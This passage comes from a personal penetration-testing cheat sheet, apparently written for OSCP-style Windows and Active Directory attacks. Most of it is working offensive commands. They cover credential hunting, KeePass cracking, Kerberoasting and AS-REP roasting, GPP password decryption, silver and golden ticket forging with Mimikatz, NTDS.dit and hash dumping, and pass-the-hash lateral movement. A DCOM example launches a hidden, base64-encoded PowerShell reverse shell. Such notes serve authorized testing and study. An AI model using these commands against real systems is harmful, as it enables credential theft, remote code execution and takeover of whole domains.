C:\\Users\\sathvik\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt ``` ### Searching for passwords ```powershell dir .s *pass* == *.config findstr /si password *.xml *.ini *.txt ``` ### Searching in Registry for Passwords ```powershell reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` 💡 Always check documents folders, i may contain some juicy files ### KDBX Files ```powershell #These are KeyPassX password stored files cmd> dir /s /b *.kdbx Ps> Get-ChildItem -Recurse -Filter *.kdbx #Cracking keepass2john Database.kdbx > keepasshash john --wordlist=/home/sathvik/Wordlists/rockyou.txt keepasshash ``` ## Dumping Hashes 1. Use Mimikatz 2. If this is a domain joined machine, run BloodHound. --- # Active Directory Pentesting 💡 We perform the following stuff once we’re in AD network ## Enumeration ```bash net localgroup Administrators #to check local admins ``` ### Powerview ```powershell Import-Module .\\PowerView.ps1 #loading module to powershell, if it gives error then change execution policy Get-NetDomain #basic information about the domain Get-NetUser #list of all users in the domain # The above command's outputs can be filtered using \"select\" command. For example, \"Get-NetUser | select cn\", here cn is sideheading for the output of above command. we can select any number of them seperated by comma. Get-NetGroup # enumerate domain groups Get-NetGroup \"group name\" # information from specific group Get-NetComputer # enumerate the computer objects in the domain Find-LocalAdminAccess # scans the network in an attempt to determine if our current user has administrative permissions on any computers in the domain Get-NetSession -ComputerName files04 -Verbose #Checking logged on users with Get-NetSession, adding verbosity gives more info. Get-NetUser -SPN | select samaccountname,serviceprincipalname # Listing SPN accounts in domain Get-ObjectAcl -Identity # enumerates ACE(access control entities), lists SID(security identifier). ObjectSID Convert-SidToName # converting SID/ObjSID to name # Checking for \"GenericAll\" right for a specific group, after obtaining they can be converted using convert-sidtoname Get-ObjectAcl -Identity \"group-name\" | ? {$_.ActiveDirectoryRights -eq \"GenericAll\"} | select SecurityIdentifier,ActiveDirectoryRights Find-DomainShare #find the shares in the domain Get-DomainUser -PreauthNotRequired -verbose # identifying AS-REP roastable accounts Get-NetUser -SPN | select serviceprincipalname #Kerberoastable accounts ``` ### Bloodhound - Collection methods - database ```powershell # Sharphound - transfer sharphound.ps1 into the compromised machine Import-Module .\\Sharphound.ps1 Invoke-BloodHound -CollectionMethod All -OutputDirectory -OutputPrefix \"name\" # collects and saved with the specified details, output will be saved in windows compromised machine # Bloodhound-Python bloodhound-python -u 'uname' -p 'pass' -ns -d -c all #output will be saved in you kali machine ``` - Running Bloodhound ```powershell sudo neo4j console # then upload the .json files obtained ``` ### LDAPDOMAINDUMP - These files contains information in a well structured webpage format. ```bash sudo ldapdomaindump ldaps:// -u 'username' -p 'password' #Do this in a new folder ``` ### PlumHound - Link: https://github.com/PlumHound/PlumHound install from the steps mentioned. - Keep both Bloodhound and Neo4j running as this tool acquires information from them. ```bash sudo python3 plumhound.py --easy -p #Testing connection python3 PlumHound.py -x tasks/default.tasks -p #Open index.html as once this command is completed it produces somany files firefox index.html ``` ### PingCastle - [www.pingcastle.com](https://www.pingcastle.com) - Download Zip file from here. - This needs to be run on windows machine, just hit enter and give the domain to scan. - It gives a report at end of scan. ### PsLoggedon ```powershell # To see user logons at remote system of a domain(external tool) .\\PsLoggedon.exe \\\\ ``` ### GPP or CPassword - Impacket ```bash # with a NULL session Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER' # with cleartext credentials Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' # pass-the-hash (with an NT hash) Get-GPPPassword.py -hashes :'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' # parse a local file Get-GPPPassword.py -xmlfile '/path/to/Policy.xml' 'LOCAL' ``` - SMB share - If SYSVOL share or any share which `domain` name as folder name ```bash #Download the whole share https://github.com/ahmetgurel/Pentest-Hints/blob/master/AD%20Hunting%20Passwords%20In%20SYSVOL.md #Navigate to the downloaded folder grep -inr \"cpassword\" ``` - Crackmapexec ```bash crackmapexec smb -u -p -d -M gpp_password crackmapexec smb -u -H LMHash:NTLMHash -d -M gpp_password ``` - Decrypting the CPassword ```bash gpp-decrypt \"cpassword\" ``` ## **Attacking Active Directory** 💡 Make sure you obtain all the relevant credentials from compromised systems, we cannot survive if we don’t have proper creds. ### Zerologon - [Exploit](https://github.com/VoidSec/CVE-2020-1472) - We can dump hashes on target even without any credentials. ### Password Spraying ```powershell # Crackmapexec - check if the output shows 'Pwned!' crackmapexec smb -u users.txt -p 'pass' -d --continue-on-success #use continue-on-success option if it's subnet # Kerbrute kerbrute passwordspray -d corp.com .\\usernames.txt \"pass\" ``` ### AS-REP Roasting ```powershell impacket-GetNPUsers -dc-ip / : -request #this gives us the hash of AS-REP Roastable accounts, from kali linux .\\Rubeus.exe asreproast /nowrap #dumping from compromised windows host hashcat -m 18200 hashes.txt wordlist.txt --force # cracking hashes ``` ### Kerberoasting ```powershell .\\Rubeus.exe kerberoast /outfile:hashes.kerberoast #dumping from compromised windows host, and saving with customname impacket-GetUserSPNs -dc-ip / : -request #from kali machine hashcat -m 13100 hashes.txt wordlist.txt --force # cracking hashes ``` ### Silver Tickets - Obtaining hash of an SPN user using **Mimikatz** ```powershell privilege::debug sekurlsa::logonpasswords #obtain NTLM hash of the SPN account here ``` - Obtaining Domain SID ```powershell ps> whoami /user # this gives SID of the user that we're logged in as. If the user SID is \"S-1-5-21-1987370270-658905905-1781884369-1105\" then the domain SID is \"S-1-5-21-1987370270-658905905-1781884369\" ``` - Forging silver ticket Ft **Mimikatz** ```powershell kerberos::golden /sid: /domain: /ptt /target: /service: /rc4: /user: exit # we can check the tickets by, ps> klist ``` - Accessing service ```powershell ps> iwr -UseDefaultCredentials :// ``` ### Secretsdump ```powershell secretsdump.py / : @ secretsdump.py uname@IP -hashes lmhash:ntlmhash #local user secretsdump.py domain/uname@IP -hashes lmhash:ntlmhash #domain user ``` ### Dumping NTDS.dit ```bash secretsdump.py / : @ -just-dc-ntlm #use -just-dc-ntlm option with any of the secretsdump command to dump ntds.dit ``` ## Lateral Movement in Active Directory ### psexec - smbexec - wmiexec - atexec - Here we can pass the credentials or even hash, depending on what we have > *Always pass full hash to these tools!* > ```powershell psexec.py / : @ # the user should have write access to Admin share then only we can get sesssion psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 / @ #we passed full hash here smbexec.py / : @ smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 / @ #we passed full hash here wmiexec.py / : @ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 / @ #we passed full hash here atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 / @ #we passed full hash here ``` ### winrs ```powershell winrs -r: -u: -p: \"command\" # run this and check whether the user has access on the machine, if you have access then run a powershell reverse-shell # run this on windows session ``` ### crackmapexec - If stuck make use of [Wiki](https://www.crackmapexec.wiki/) ```powershell crackmapexec {smb/winrm/mssql/ldap/ftp/ssh/rdp} #supported services crackmapexec smb -u user.txt -p password.txt --continue-on-success # Bruteforcing attack, smb can be replaced. Shows \"Pwned\" crackmapexec smb -u user.txt -p password.txt --continue-on-success | grep '[+]' #grepping the way out! crackmapexec smb -u user.txt -p 'password' --continue-on-success #Password spraying, viceversa can also be done #Try --local-auth option if nothing comes up crackmapexec smb -u 'user' -p 'password' --shares #lists all shares, provide creds if you have one crackmapexec smb -u 'user' -p 'password' --disks crackmapexec smb -u 'user' -p 'password' --users #we need to provide DC ip crackmapexec smb -u 'user' -p 'password' --sessions #active logon sessions crackmapexec smb -u 'user' -p 'password' --pass-pol #dumps password policy crackmapexec smb -u 'user' -p 'password' --sam #SAM hashes crackmapexec smb -u 'user' -p 'password' --lsa #dumping lsa secrets crackmapexec smb -u 'user' -p 'password' --ntds #dumps NTDS.dit file crackmapexec smb -u 'user' -p 'password' --groups {groupname} #we can also run with a specific group and enumerated users of that group. crackmapexec smb -u 'user' -p 'password' -x 'command' #For executing commands, \"-x\" for cmd and \"-X\" for powershell command #Pass the hash crackmapexec smb -u username -H --local-auth #We can run all the above commands with hash and obtain more information #crackmapexec modules crackmapexec smb -L #listing modules crackmapexec smb -M mimikatx --options #shows the required options for the module crackmapexec smb -u 'user' -p 'password' -M mimikatz #runs default command crackmapexec smb -u 'user' -p 'password' -M mimikatz -o COMMAND='privilege::debug' #runs specific command-M ``` - Crackmapexec database ```bash cmedb #to launch the console help #run this command to view some others, running individual commands give infor on all the data till now we did. ``` ### Pass the ticket ```powershell .\\mimikatz.exe sekurlsa::tickets /export kerberos::ptt [0;76126]-2-0-40e10000-Administrator@krbtgt- .LOCAL.kirbi klist dir \\\\ \\admin$ ``` ### DCOM ```powershell $dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application.1\",\"192.168.50.73\")) $dcom.Document.ActiveView.ExecuteShellCommand(\"cmd\",$null,\"/c calc\",\"7\") $dcom.Document.ActiveView.ExecuteShellCommand(\"powershell\",$null,\"powershell -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5A... AC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA\",\"7\") ``` ### Golden Ticket 1. Get the krbtgt hash ```powershell .\\mimikatz.exe privilege::debug #below are some ways lsadump::lsa /inject /name:krbtgt lsadump::lsa /patch lsadump::dcsync /user:krbtgt kerberos::purge #removes any exisiting tickets #sample command kerberos::golden /user:sathvik /domain:evilcorp.com /sid:S-1-5-21-510558963-1698214355-4094250843 /krbtgt:4b4412bbe7b3a88f5b0537ac0d2bf296 /ticket:golden #Saved with name \"golden\" here, there are other options to check as well ``` 1. Obtaining access! ```powershell mimikatz.exe #no need for highest privileges kerberos::ptt golden misc::cmd #we're accessing cmd ``` ### Shadow Copies ```powershell vshadow.exe -nw -p C: copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\windows\\ntds\\ntds.dit c:\\ntds.dit.bak reg.exe save hklm\\system c:\\system.bak impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL ``` --- ## Tools ```bash [OSCP](https://github.com/0xsyr0/OSCP) [CheatSheet](https://github.com/exfilt/CheatSheet) ```"}]